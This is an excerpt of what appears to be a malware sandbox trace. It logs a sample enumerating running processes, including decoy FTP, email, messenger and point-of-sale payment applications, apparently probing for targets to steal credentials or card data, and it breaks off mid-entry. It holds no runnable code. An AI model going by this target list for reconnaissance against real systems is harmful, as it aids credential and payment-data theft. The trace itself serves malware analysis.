1 [0275.928] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0275.929] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0275.931] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0275.932] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0275.934] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0275.938] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.939] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.940] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0275.942] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.943] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.945] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.946] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.947] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0275.949] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.002] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.004] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0276.006] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0276.007] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0276.009] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.010] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0276.015] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0276.017] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0276.018] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0276.020] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0276.021] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0276.022] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0276.024] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0276.025] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0276.027] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0276.050] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0276.051] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0276.053] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0276.054] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0276.056] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0276.057] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0276.125] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0276.126] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0276.128] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0276.129] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0276.131] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0276.132] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0276.134] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0276.135] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0276.154] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0276.157] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0276.159] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0276.161] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0276.163] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0276.165] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0276.168] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0276.173] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0276.175] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0276.177] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0276.179] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0276.181] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0276.183] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0276.225] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0276.227] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0276.229] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0276.235] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0276.237] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0276.239] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0276.242] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0276.244] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0276.247] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0276.252] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0276.254] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0276.256] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0276.258] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0276.260] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0276.297] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0276.299] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0276.301] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0276.303] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0276.305] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0276.307] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0276.310] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0276.312] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0276.314] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0276.316] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0276.319] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0276.321] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0276.323] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0276.326] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, 